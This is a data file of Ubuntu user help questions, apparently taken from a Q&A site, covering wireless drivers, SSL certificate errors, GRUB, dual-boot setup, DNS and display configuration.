444703	lubuntu wireless driver problems ( lubuntu 12.04 , realtek rtl8190 )	i have freshly installed lubuntu on a friends pc , but i am unable to get the wireless working . there is no option to scan for networks and adding one manually does nothing . $ sudo lshw -c network *-network description : ethernet interface product : netxtreme bcm5751 gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 01 serial : 00:12:3f:76:65:05 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 duplex=full firmware=5751-v3.44a ip=192.168.1.103 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:17 memory : f7ef0000-f7efffff *-network unclaimed description : network controller product : rtl8190 802.11n wireless lan vendor : realtek semiconductor co. , ltd. physical id : 5 bus info : pci @ 0000:05:05.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=64 maxlatency=64 mingnt=32 resources : ioport : dc00 ( size=256 ) memory : f7dff000-f7dfffff any help would be greatly appreciated !
444705	ca n't boot computer from cd or fdd	i am currently using a toshiba tecra m2 from the 2003/2004 era , this will not allow me to boot from cd of flash drive , i have changed the boot priority in the bios , no luck . is there a way to intsall ubuntu without using the cd or fdd ? so far i have n't found a way , can anybody help me with this ? ? ? thanks in advance .
444706	12.04.4 server ca n't verify common ssl certificates , usual fixes failing	the problem i 've got one server in a farm which is suddenly unable to correctly handle ssl certificates . attempting to do a curl command like curl -v https : //google.com results in : curl -v https : //google.com * about to connect ( ) to google.com port 443 ( # 0 ) * trying 74.125.137.101 ... connected * successfully set certificate verify locations : * cafile : none capath : /etc/ssl/certs * sslv3 , tls handshake , client hello ( 1 ) : * sslv3 , tls handshake , server hello ( 2 ) : * sslv3 , tls handshake , cert ( 11 ) : * sslv3 , tls alert , server hello ( 2 ) : * ssl certificate problem , verify that the ca cert is ok . details : error:14090086 : ssl routines : ssl3_get_server_certificate : certificate verify failed using openssl s_client is a little more detailed . # openssl s_client -host google.com -port 443 connected ( 00000003 ) depth=2 /c=us/o=geotrust inc./cn=geotrust global ca verify error : num=20 : unable to get local issuer certificate things tried so far reinstalling ca-certificates - already have the latest available version , according to aptitude , version : 20130906ubuntu0.12.04.1 . reconfiguring ca-certificates via dpkg-reconfigure . this appears to rehash the /etc/ssl/certs folder but has no effect on the problem . using update-ca-certificates -- fresh to regenerate the symbolic links in that folder grabbing the latest mozilla ca bundle from curl.haxx.se - by putting that .pem file in /etc/ssl/certs and running the update command . weirdness the certificate that curl claims it can not find is indeed in the certification path . # ls -l /etc/ssl/certs/*geo* lrwxrwxrwx 1 root root 57 apr 7 15:57 /etc/ssl/certs/geotrust_global_ca.pem - > /usr/share/ca-certificates/mozilla/geotrust_global_ca.crt ... the certificate file referenced has the same permissions as every other box on my network , namely 644 . # ls -l /usr/share/ca-certificates/mozilla/geotrust_global_ca.crt -rw-r -- r -- 1 root root 1216 feb 20 11:49 /usr/share/ca-certificates/mozilla/geotrust_global_ca.crt other secure sites such as github show identical issues with different certificates . i am running the absolute latest version available of all packages for ubuntu 12.04.4 , including curl , openssl , and ca-certificates . what 's going on here ?
444708	is there any manual to get the list of bash shortcut keys ?	there are many shortcuts that i use while interacting with bash command line to make the work easier and faster . like : ctrl+l : to clear the screen ctrl+a/ctrl+e : to move start/end of the line ctrl+r : to search the history of command just writing few of chars ctrl+u/ctrl+y : to cut/paste the line . and many many more , that i want to know and which will definitely useful to learn . i want to know from where can i get the list of these shortcuts in ubuntu ? is there any manual which lists these shortcuts ? note : i want to get the list of shortcuts and their actions at one place . it will really help to learn many of them in a small duration of time . so is there way we can get the list like this ? though thanks for answer given here..
444710	how to uninstall or remove reddit script ?	i was experimenting and i downloaded and installed ( i guess ) the reddit install script . after that i saw that it was advised to do it in a virtualbox . so , i want to remove it . how can i do it ? has it changed anything in my computer ? thanks !
444711	how can i force unattended-upgrades to run on demand ?	this is probably an easy thing to do but i found no answers while googling for it . i have unattended-upgrades installed and running successfully for the past few months . it will run again tonight - but i want to run it right now . is there a simple command to do so ? i know it is a cron job , ideally it would execute in the same context as it always does i am running ubuntu 12.04 lts , if that helps .
444713	is there a way to switch into another user account from a script ?	let 's say i have an account on a small network of machines that is set to auto-login . if one of the machines has a problem with the network or one of its services , i need to break out of the application the default account is running and kill it , which then takes me to the login prompt . currently this is done with a custom control-alt-delete.conf : description `` kill flock on control+alt+delete '' start on control-alt-delete task exec killall flock_start is there a way i can add a line to have lightdm automatically log in to the troubleshooting account ? thanks .
444714	how do i swap escape and caps lock in 14.04 ?	it appears that the keyboard layout options that allow things such as `` swap the escape key and caps lock '' have disappeared from the keyboard settings in 14.04 is there another gui where they can be set ? or is it back to dotfiles ?
444721	how do i convert a high quality video into a low quality one ?	the computer is relatively old and underpowered , so video playback of high quality videos is jerky with any player . how do i convert a high quality video to low quality video ? edit : i tried avconv -fs to limit size and -filter scale=iw/2 : ih/2 to resize to 1/2 ; with output to mp4 and mpg . all 4 resulting files are not very good : vlc can play the video , but the quality is abysmal on the 1366x768 screen . the source format is video : h264 ( high ) , yuv420p , 1920x800 , 2030 kb/s , 23.98 fps , 23.98 tbr , 24k tbn , 47.95 tbc , bitrate : 2127 kb/s ( as reported by avconv ) .
444722	usb to serial - what comport ?	i have a usb to serial adapter because my ibm thinkpad t41 has no built-in serial port . it works ok as com3 in win xp , but not in ubuntu 10 . how can i find what port it is emulating ?
444723	external monitors not detected with dual gpu xubuntu 13.10/14.04	i have dual-booted xubuntu with windows 7 . in both the previous xubuntu ( 13.04 , did a clean install of 13.10 ) and windows 7 i managed to get my triple monitor setup working . i have two radeon hd6870 's . in one there is only one dvi-cable to my main monitor , which is detected and the other gpu , with two dvi-cables are not detected . however both the gpu 's are detected . $ lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] barts xt [ radeon hd 6870 ] 02:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] barts xt [ radeon hd 6870 ] $ xrandr screen 0 : minimum 320 x 200 , current 1920 x 1200 , maximum 16384 x 16384 dfp1 disconnected ( normal left inverted right x axis y axis ) dfp2 disconnected ( normal left inverted right x axis y axis ) dfp3 disconnected ( normal left inverted right x axis y axis ) dfp4 disconnected ( normal left inverted right x axis y axis ) dfp5 disconnected ( normal left inverted right x axis y axis ) dfp6 disconnected ( normal left inverted right x axis y axis ) dfp7 disconnected ( normal left inverted right x axis y axis ) dfp8 disconnected ( normal left inverted right x axis y axis ) dfp9 disconnected ( normal left inverted right x axis y axis ) dfp10 disconnected ( normal left inverted right x axis y axis ) dfp11 connected 1920x1200+0+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 1920x1080 59.9 1600x1200 59.9 1680x1050 59.9 1400x1050 59.9 1600x900 59.9 1360x1024 59.9 1280x1024 60.0 1440x900 59.9 1280x960 59.9 1280x800 59.9 1280x768 59.9 1280x720 59.9 1024x768 59.9 800x600 59.8 640x480 59.8 crt1 disconnected ( normal left inverted right x axis y axis ) as for xorg.conf , made using sudo aticonfig -- initial=dual-head : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 screen `` aticonfig-screen [ 0 ] -1 '' rightof `` aticonfig-screen [ 0 ] -0 '' endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -1 '' driver `` fglrx '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -1 '' device `` aticonfig-device [ 0 ] -1 '' monitor `` aticonfig-monitor [ 0 ] -1 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection i have both amdcccle and fglrx installed . crossfire is off . pretty much the same as : xubuntu does not recognise second identical ati graphics card but his question was n't answered . any tips or suggestions ? would i need a new gpu just for this ?
444726	need help very desperate to getting wi-fi	hello there i 'm new to ubuntu and i am having wi-fi issues the problem i have encountered are that my wpa2 key is 64 and the wpa.conf only allows a maximum of 63 is there a equal to change it also i 'm having trouble connecting in general i compiled and installed the rr5572 ralink driver but i 'm totally lost i do n't know what to do i think i did quite well considering i have been only using windows until now . can someone give me support i have kik and bbm . i 'm totally lost so any fellow ubuntu users please help me .
444728	how to definitely remove osx after successful dualboot	i 've been running osx 10.6.8 and ubuntu-studio 12.04 on my macbookpro 5'5 for a couple of weeks now.i barely do anything on osx anymore so i see no reason to keep using disk space for it . so now i want to get rid of that apple and go pinguin style all the way . but how can i remove the the osx partition without messing up with refit ? so i 'm scared my ubuntu wo n't boot if i simply whipe the osx partition and the refit one from a gparted live cd or usb . so what 's the story there ? thanks for your help !
444729	redirect port 80 to 8080 and make it work on local machine	i redirected traffic for port 80 to 8080 on my machine with sudo iptables -a prerouting -t nat -p tcp -- dport 80 -j redirect -- to-port 8080 it works fine for all world except my own machine . i am developer and i need to redirect port 80 to 8080 for myself . my ip is 192.168.0.111 my web server runs on port 8080 i wish to open website from http : //192.168.0.111/ instead of http : //192.168.0.111:8080/ from same machine where server runs .
444730	installed ubuntu 12.04 i ca n't connect with internet . there is n't established a connection with the router	from the usb installed ubuntu 12.04 in my computer , with windows xp in the other boot . from usb i have connection with internet without any problem . but from the computer there is the announcement no connection with internet . filled in ip address , device mac address , the password of the wireless connection . what did i forget ?
444732	sdl2 not being loaded correctly by jedi academy ( openjk )	so i am trying to install star wars jedi knight jedi academy on my laptop , running ubuntu 13.10 . as you may or may not know , this game is quite old and the creators , lucasarts , have only made versions for mac and windows . however , fortunately , a few years ago the game 's source code was released , and the openjk project was born . essentially they are rewriting the games code , and have made it so that you can play the game on linux , without wine , as smoothly as it plays on other operating systems . link to github page . the compilation and everything worked absolutely fine , and there is nothing wrong with openjk as far as i know , and i know people who use it in linux , my problem appears to be sdl2 . or rather , my apparent lack of it . when i try to execute the file that should start the game , i get this error : ./openjk.x86_64 : error while loading shared libraries : libsdl2.so.0 : can not open shared object file : no such file or directory well , as far as i know i do have sdl2 , having done this : sudo apt-get install libsdl2-2.0-0 and this sudo apt-get install libsdl2-dev also , i have visited several sites with guides on installing this , and have installed a ridiculous amount of dependencies for sdl2 . so i presume i have them all . if you think you may have found a list i have not , feel free to post it below for me to try . and , as a final step before i went ahead and posted this question , i downloaded the most recent sdl2.tar.gz from the website , extracted the files , and ran : ./autogen.sh ./configure ; make ; sudo make install and the installation worked , so this left me even more confused after i ran sudo ldconfig and still the jedi academy file returned the same error . unfortunately , it seems like the sdl2 i have is not good enough for jedi academy , and therefore is not good enough for me ) : does anyone know what the root of the problem is here ? is it with openjk , or with sdl2 , or do i need to get a different version perhaps ? any thoughts or help would be greatly appreciated , as i am at a loss . thank you .
444734	in what way are doc , info , man , help different ?	what 's the difference between documentation ( doc ) , manuals ( man ) , help , and information ( info ) ? i 've seen these four different words used across different system but mostly in ubuntu . for the most part they seem to be interchangeable , but what is the difference between them or are they all the same ? this question might not belong here , if that 's the case please tell me and i 'll remove it .
444736	why do i see a `` firefox '' button on firefox 28 ?	i noticed that recently the `` firefox '' button appears again in my firefox 28 , even with global menu installed . this is really back or is something wrong with my firefox on ubuntu 13.10 ?
444741	temporary failure resolving 'security.ubuntu.com '	this is a new install of ubuntu 12.04 server . i have searched for this answer and i find many that just do not work . sometimes the answer is incomplete , happens a lot , or missing a few basic commands , or not applicable to this version because the files indicated do not exist . this problem seems fairly common from what i have read , as stated before still unresolved by me . after setting up the virtual servers in apache2 i proceeded to install the rest of the needed apps using webmin 1.680 and this is the result i get from anything i try to install or update . sudo apt-get install php5 libapache2-mod-php5 php5-mcrypt -y reading package lists ... building dependency tree ... reading state information ... the following extra packages will be installed : apache2-mpm-prefork libmcrypt4 php5-cli php5-common suggested packages : php-pear libmcrypt-dev mcrypt php5-suhosin the following packages will be removed : apache2-mpm-worker the following new packages will be installed : apache2-mpm-prefork libapache2-mod-php5 libmcrypt4 php5 php5-cli php5-common php5-mcrypt 0 upgraded , 7 newly installed , 1 to remove and 2 not upgraded . need to get 8,094 kb of archives . after this operation , 19.7 mb of additional disk space will be used . err http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main apache2-mpm-prefork amd64 2.2.22-1ubuntu1.5 for additional information ; there have been no changes in the hardware from the beginning of the install to this point . apt-get 'whatever ' does n't work either
444743	disable skype4py on pidgin but not empathy	so , i 'm having the same problem as this guy : pidgin ignores preferences i 've tried to get pidgin working the way i wanted , namely to disable all notifications . which means that i do not want the im-window to appear if a new message arrive , and to disable the blue envelope colouring upon receving a new message . i set the settings : interface - show system tray icon - never interface - hide new im conversations - always but they are somehow ignored ... is this a bug ? can i solve it ? preferably remove pidgin from the indicator-message menu at all , without closing it ? btw : i 'm running 13.10 edit : this happens with the skype4py plugin i was wondering if it 's possible to disable skype4py on pidgin but not empathy so i can use empathy with skype and pidgin for everything else . note : the reason i use empathy and pidgin is for the gnome intergration
444744	how can run a shell script in openssl ?	i have a script called abc.sh . it contains openssl commands . i want to run it using terminal . can somebody please explain how can i run this abc.sh file in terminal ?
444745	data recovery - hard disk formatted from ntfs to ext4 then again to ntfs	i 'm all messed up ! i formatted my complete ntfs hard disk to ext4 . then again installed win 7 by creating 2 partitions of 50gb and 250 gb . is it possible to recover data from the 250 gb partition now that it has been formated several times . please help .
444749	grapics driver not identified in ubuntu 12.04	i just installed ubuntu 12.04 on my laptop.but now wheni check the system information the graphics option is said to be unknown .
444751	i 'm trying to save an old macbook . how can i create a bootable usb using my pc that will work on the macbook ?	i have tried : booting with .iso formatted usb converting .iso to img , writing the .img to the usb the macbook does not recognize either of these during startup any suggestions ?
444752	manual time syncing	is there a command or some option in kde environment with which i can manually sync system 's time and date with a time server ( eg public time server ( pool.ntp.org ) ) ?
444753	wireless usb not working	my usb dosent work for more then 10 min before it goes out it is a edimax nano wireless usb . can i install the drivers on linux ? idk what to do please help
444755	ubuntu wo n't start unless laptop is plugged in . this has happened on 2 different laptops	so , i 've been using ubuntu on an off again for a few years , and i decided to permanently install it on a spare laptop that was gathering dust . it worked fine , but i did notice one little quirk , that it would no turn on unless it was plugged in to the wall . this first laptop was a gig of ram vista relic sony . so , i decide to dual boot on my main laptop , which is a gateway that is close to two years old . i have the same problem on this laptop . there was a couple threads about this situation happening to people , but they never got resolved , only closed . so , can anyone help me out ? much appreciated ! edit : i should add that this is what happens when i boot it while it is not plugged into the charger ( this goes for both laptops ) : grub comes up , i choose ubuntu . wait , wait , wait . a full minute later and i 'm still staring at a dark purple screen instead of the desktop . happens every single time .
444761	can not ping ubuntu in vmware	i installed ubuntu 12.4 in vmplayer on win 7 host . installation is fine except one issue . i can not ping ubuntu machine from my host and vice versa . my laptop has wireless . i have tried to setup network using all 3 options ( nat , host only , bridged ) however it gives same issue . when i ping it gives destination host unreachable . can someone help pls . pls note that i dont have much background on the networking things , so it might be pretty basic issue which i am misssing . i googled lot of sites for the issue and i edited /etc/network/interfaces file to assign static ip , however even after that i am getting issue .
444762	clonezilla syslinux and partition mounting	i recently cloned my current ubuntu working environment ( 12.04 ) to an ext4 partition of my external hard drive using clonezilla . when i wanted to boot from this partition i get the error message from syslinux : ldlinux.c32 not found . now i want to fix that ( i do n't really have a clue how to do that for now ) but i guess that first i need to have access to that partition . after booting from my normal ubuntu on local hard drive , i can not mount the partition where another ubuntu is installed . probably because both want to be mounted to / . i tried to change etc/fstab and mount my external drive to /ext ( a folder that i created ) but when i reboot and my harddrive is plugged in , the system is blocked at the purple ubuntu start screen . does anybody knows how to fix any of these problems ? thanks
444763	any effort to get fancontrol uninstalled fails repeatedly	below is what i am experiencing trying to remove fan control for the purposes of re-installing it . package concmv is missing a newline is what bother me . i try to remove convmv to no avail . any ideas ? tim @ tim-aspire-7720 : ~ $ sudo apt-get remove fancontrol reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : fancontrol 0 upgraded , 0 newly installed , 1 to remove and 14 not upgraded . after this operation , 114 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 65 % dpkg : unrecoverable fatal error , aborting : files list file for package 'convmv ' is missing final newline w : could not open file '/var/log/apt/term.log ' - openlog ( 21 : is a directory ) e : sub-process /usr/bin/dpkg returned an error code ( 2 ) tim @ tim-aspire-7720 : ~ $ tim @ tim-aspire-7720 : ~ $ sudo apt-get remove convmv e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . tim @ tim-aspire-7720 : ~ $ sudo dpkg -- configure -a tim @ tim-aspire-7720 : ~ $ sudo apt-get remove convmv reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : convmv 0 upgraded , 0 newly installed , 1 to remove and 14 not upgraded . after this operation , 90.1 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 65 % dpkg : unrecoverable fatal error , aborting : files list file for package 'convmv ' is missing final newline w : could not open file '/var/log/apt/term.log ' - openlog ( 21 : is a directory ) e : sub-process /usr/bin/dpkg returned an error code ( 2 ) tim @ tim-aspire-7720 : ~ $
444767	hp dv9000 with just a few issues	i have an hp pavillion dv9000 series with 2x64 bit processors , nvidia drivers , but while all of those things are running fine ... i could use a little help getting webcam , & cd drive recognized after boot up , as well as resolving the qemu/kvm warning at bios . i wondered if there might be an issue with svm relating to kvm and possibly a script that enables better hardware selection that might enable the camera and dvd drive . i 'd be okay with disabling/removing kvm but would prefer keep it enabled if possible .
444770	can not access internet from ubuntu 12.04 lts wifi or ethernet not working	i installed ubuntu from a thumbdrive version 12.04 lts . if i run ubuntu from the thumb drive , i have an ethernet connection , but no wifi . if i install ubuntu , i do have any internet connections . ethernet and wifi do not work . i have read many suggestions , but i need an internet connection to try them .. also , since i can get to the internet on the thumbdrive , does this mean there is a file on the thumbdrive that i need ? also , when i run the command sudo ifconfig eth0 up i get error while getting interface flags : no such device
444771	cisco vpn client	i am having problem with vpn , my vpn configuration tab only displays ethernet configuration i tried to install vpnc manger and it says it ; s already installed by my vpn config only shows ethernet info , then i installed l2tp/ipsec and it ca n't connect..iam trying to connect to vpn server on an asa firewall with group name , pre-shared key , user name and password using vpnc manager , i think vpnc does it but i ca n't get it to launch right i tried to restart but same thing ... my ubuntu version is 13.10 . thanks
444772	black screen pops up after login in ubuntu 12.04 lts on dell inspiron 1564	i can log in , but after of couple of minutes of usage a black screen pops up .
444773	compiz , weird artifacting on desktop cube	so i got mate installed on ubuntu gnome i installed compiz compizconfig-settings-manager compiz-plugins and changed the window manager from marco to compiz . i enabled the desktop cube and ... ? ? ? https : //www.youtube.com/watch ? v=tiytl1akzyc i have a better picture here : how do i fix this ? i use a nvidia geforce gtx 760 .
444775	problem with setting up path in eclipse for sdk	i am currently working on ubuntu 12.04 lts and i have installed eclipse from the ubuntu software center and then according to the procedure suggested i dealt with the adt . next i had to install sdk so i installed the sdk from ( http : //developer.android.com/sdk/index.html ? hl=sk ) â and then i need to set up sdk path . i tried to fix it with different ways but it gives the same error every time . the error i get is : unable to run 'adb ' : can not run program '' /home/mrudav/desktop/android-tutorials/adt-bundle-linux-x86_64-20140321/sdk/platform-tools/adb '' : java.io.ioexception : error=2 , no such file or directory .
444777	update-grub not respecting preferences from /etc/default/grub	following the advice from an answer to how do i remove or hide old kernel versions to clean up the boot menu or free space ? , i found myself having to put up with the grub boot menu every time i started the system . i followed the instructions to hide the menu by editing /etc/default/grub and then running update-grub , and it seems to change /boot/grub/grub.cfg as i am able to verify that set timeout=10 becomes set timeout=0 after changing the relevant line in /etc/default/grub , but the menu still shows and it never times out ! is there any way to get grub back to the way it was ?
444778	network connection wired and wireless	wireless internet works fine . network drive connected with wired connection . disconnected frequently . i have to connect it after 10 , 15 minutes . both are connections are working . every time network wired drive disconnected , i need to disconnect the wireless connection before i can connect the wired connection . this just started today , when we change to time warner internet service . system was working fine with dsl internet system .
444779	do the 13.10 ubuntu usb can install software on it ?	i am downloaded the ubuntu 13.10 and following it manual make the iso to a 8g usb . i can boot it live with my notebook when i choose `` try it '' on the boot menu . now , i am just have some questions ... do using the `` try it '' mode , i can install software on it ? for example , apache , php , mysql , and other etc by sudo apt-get ... and if yes , do those installed software will all be lost after the next reboot to `` try it '' ? if yes , then , i am wonder , do ubuntu can install on a usb stick other than install it on a ssd/hdd ? thank you .
444780	setup workspaces	i am loving the ubuntu workspace swicther ! however , when i move my dvi cable from my laptop to my work pc ( like what a kvm switch ) would do all my screens get thrown around and when i come back i have to reposition all my windows . is there a way i can program which workspaces have which open windows . ie workspace 1 has chrome , workspace 2 has sublime text 3 , workspace 3 has pgadmin3 . also with dual screens my 9 workspaces each have two windows so i have maybe . i 'd like to just 'click ' and boom ! all my programs open and are allocated to each workspace screen . if anyone can point me in the right direction to get going on this that would be great . anything to save the 5 mins it takes each time i want to set my workspaces up .
444781	ubuntu 12.04 connected to two monitors	i have just installed ubuntu 12.04 on an acer chromebook and i am trying to connect to panasonic tv by hdmi and i ca n't get it to fit screen properly . is there any solution for this ?
444783	black screen with flashing blinking cursor	as you could guess , i have some problems with my computer , i 'm trying to boot to linux ( i tried with ubuntu , kubuntu , manjaro ) but i 'm keep getting a black screen with a blinking cursor like i already tried to search for solutions on the web but i can not find any solutions , ( i tried my computer boots to a black screen , what options do i have to fix it ? ) but nothing is working , i have : evga gtx 780 sc video card gigabyte z87x ud5h intel i7 4770k so if you have any ideas or solutions that would be great thanks
444785	ubuntu 14.04 - cups printing takes a long time to initially load	i 'm using ubuntu 14.04 , and while the cupsd service does eventually load , it takes roughly 20 seconds after boot until it shows up under ps aux . i had the same problem with 12.04 . is there any way to start this service faster or load it before other services ? thanks.. mark
444791	could not unmount /dev/sda1 with root filesystem	could not unmount /dev/sda1 with root filesystem . when i try to resize it by unmounting but the following error message pops up : the partition could not be unmounted from the following mount points : / most likely other partitions are also mounted on these mount points . you are advised to unmount them manually . how to go about ?
444792	install ubuntu on dell lattitude d600	hi everyone my name is ryan . i have dell lattitude d600 laptop i have window xp installed on this pc and i want install ubuntu and i try to install the new version of ubuntu in this pc and when i was installing ubuntu the error came on the screen . it said i am missing kernel . after that i look for information about this error that i need more ram for this laptop and i want to know what version ubuntu i can install on this machine . i already try the last three latest operating system .
444793	ubuntu 12.04 server will not resolve	i am at a loss as to why i ca n't resolve . i am sure i am missing something and i hope someone can help . i have installed ubuntu 12.04 server . after setting to static , i can not resolve host names ( to be fair i did not test it while it was dhcp ) . my lan ip for my router is 10.0.1.1 and in most cases this will resolve dns but i changed to open dns servers just in case . but i still get : root @ wculs-1 : ~ # host google.com ; ; connection timed out ; no servers could be reached this is my current /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 208.67.222.222 nameserver 208.67.220.220 /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 # iface eth0 inet dhcp iface eth0 inet static address 10.0.1.10 netmask 255.255.255.0 network 10.0.1.0 broadcast 10.0.1.255 gatway 10.0.1.1 /etc/resolvconfig/resolv.confd/base nameserver 208.67.222.222 nameserver 208.67.220.220 thanks for taking the time to read my question .
444794	ubuntu installation issue gigabyte z68xp-ud4 with a gtx780oc	i want to dual boot my windows 7 desktop pc with ubuntu 12.04 or 14.04 so that i can run openfoam cfd software . i have tried with a cd but no luck , the install just does n't progress . the purple screen comes up , then disappears , some text appears on screen and then an underscore in the top left corner just starts flashing ... nothing else happens . gigabyte 's website says `` due to different linux support condition provided by chipset vendors , please download linux driver from chipset vendors ' website or 3rd party website . '' i 'm stuck as i do n't know which ones/have n't been able to find the drivers i need . i am very new to ubuntu and i 'm not sure where to start . i have been having a lot of trouble installing ubuntu . here are my system specifications . motherboard : gigabyte z68xp-ud4 ( rev1.3 ) ( z68 express chipset ) gpu : gigabyte gtx780oc ssd : intel 520 256gb ( 40gb to be partitioned for linux ) ram : corsair vengeance low profile ( 16gb , 4x2gb , 1600mhz ) cpu : intel core i7 2600k
444796	installed ubuntu and now wo n't boot with ca n't find device	computer is dell inspiron n5110 with i5 processor 320gb drive 200gb second drive 4gb ram and windows 7 . install was side by side but now i ca n't boot either . i get grub rescue prompt ( whatever that is ) . help .
444802	unable to change memory limit in imagej	i open imagej and go to edit > options > memory & threads . i then set the parameter maximum memory from its default ( which is 479 mb for me ) to 512 mb , but i get the error : imagej is unable to change the memory limit . for more information , refer to the installation notes at http : //imagej.nih.gov/ij/docs/install/ current limit : 479mb any ideas on how to get around this ? edit : although it was n't a direct answer , @ sparhawk 's suggestion of using fiji solved my problem . i was able to change the maximum memory . by the way , fiji is just imagej , packaged up nicely with a bunch of plugins .
444807	facing error while connecting remote pc in aptana studio on ubuntu 12.04	while using aptana studio on ubuntu , i want to connect remote file in my system and i am facing this error establishing sftp connection failed : the connection did not complete the connection did not complete
444809	dual boot to single boot	i had installed two operating systems in dual boot mode with a grub menu i.e windows and ubuntu . now i have lost the password to ubuntu os . if i reinstall windows , grub will not take it and there will be error . i ca n't see the partition on which ubuntu was installed . i want to completely remove the ubuntu and reinstall windows with entire capacity of my hard disc available to me with only one os i.e windows . can you help ?
444810	editing keyboard layout	in /usr/share/x11/xkb/symbols keyboard layout files , how can i edit the 102nd key , that is usually next to left shift ? what is the code for it ? i tried ab00 , but that does not work .
444815	does ubuntu on my laptop still be alive on using 'reset your pc ' option in windows ?	i have windows 8.1 and ubuntu on my laptop . i have already tried for 'refresh your pc ' which failed . windows got stuck in automatic repair loop . does 'reset your pc ' option in advanced options in the automatic repair loop erase ubuntu part of hard disk also ?
444816	reinstall ubuntu to its default state , without an installation medium like a dvd or usb ?	having mucked up my system fairly ... horridly , i just want to get my system back to a fresh install state , where i have absolutely no leftovers from my current state , including packages , configs , users , and so forth . problem is , i just do n't have a usb flash drive [ etc ] handy . any suggestions ?
444817	am i affected ? heartbleed bug	i 've just learned about the heartbleed bug ( openssl leaking private keys ) , and based on the website , heartbleed.com , it says that openssl 1.0.1 through version f is affected . however it leaves off ubuntu 13.04 off the affected list and the repositories do not have an update to it . let me paste some information here : demortes @ vps : / $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring and demortes @ vps : / $ openssl openssl > version openssl 1.0.1c 10 may 2012 openssl > i 'm seeing that we 're not affected even though i have 1.0.1c installed ... is this accurate . if not , how can i install openssl 1.0.1g with package management now ? if it is accurate ... why ?
444822	getting permission denied error	i have written one bash script and it is run on the background , inside this script i have use the following command : sshpass -p prakash123 ssh -t -p $ 1 prakash @ localhost './update_script.sh > /update.out 2 > /update.err < /dev/null | echo $ ! > /update.pid & ' it is working fine . but i want to change the location of /update.out , /update.err and /update.pid so modified command for that : sshpass -p prakash123 ssh -t -p $ 1 prakash @ localhost './update_script.sh > /pra/log/update.out 2 > /pra/log/update.err < /dev/null | echo $ ! > /pra/log/update.pid & ' now i am getting the permission denied error . because i changed the path of output files . i am not sure but i think i have to give the super user permission like su or sudo before the sshpass so how can i change the path of /update.out , /update.err and /update.pid this file from the above command . ?
444824	ubuntu ec2 memory usage issue-high disk usage by log files .	i am new to ubuntu and i had deployed my application code ( ruby on rails ) on amazon ec2 instance which is 32 bit medium instance a couple of months ago . now i have installed nginx and thin server on it.the problem which i am having is that the nginx log files which is generated in var/log folder is more than 6 gb in space . also there is a file called access log in the same folder which had taken more than 5gb ( very huge for a single file ) . so i deleted it as there was no other option . but the problem is that the disk usage ( df -h ) is still showing that /dev/xvda1 use % is around 98 % . filesystem size used avail use % mounted on /dev/xvda1 7.9g 7.3g 224m 98 % / udev 1.9g 8.0k 1.9g 1 % /dev tmpfs 756m 180k 756m 0 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 0 1.9g 0 % /run/shm /dev/xvda2 394g 199m 374g 1 % /mnt this despite the fact that when i run du-h from the root folder i get 2.7 gb used . why is this happening and what do i have to do .
444826	xserver-xorg-video-ati do not support dual head with dvi connection	i am running ( gnome ) ubuntu 13.10 and i have an amd radeon hd 7470 graphic card ( dual head ) . i am using the xserver-xorg-video-ati as video driver . this driver is working fine if i connect my screens using vga connection . but , when i try to use the dvi connection , only one screen is working . is there a specific configuration to make it work using the dvi connection ? or , it is just the driver that do not support it ? thanks .
444831	xubuntu 12.10 wifi wo n't connect to wpa2 enterprise network	i have dual boot win7 and xubuntu 12.10 . the wifi works perfectly in win7 , and in xubuntu except for wpa2 enterprise encrypted network . i had followed the settings for ca-certificate and other specs but it just wo n't connect . i do n't want to upgrade to 13.10 yet because worried about other bugs and configurations . i was trying to modify the config file as some post suggested to make `` true- > false '' but i do n't have that line of code in the profile . please help me out . thanks .
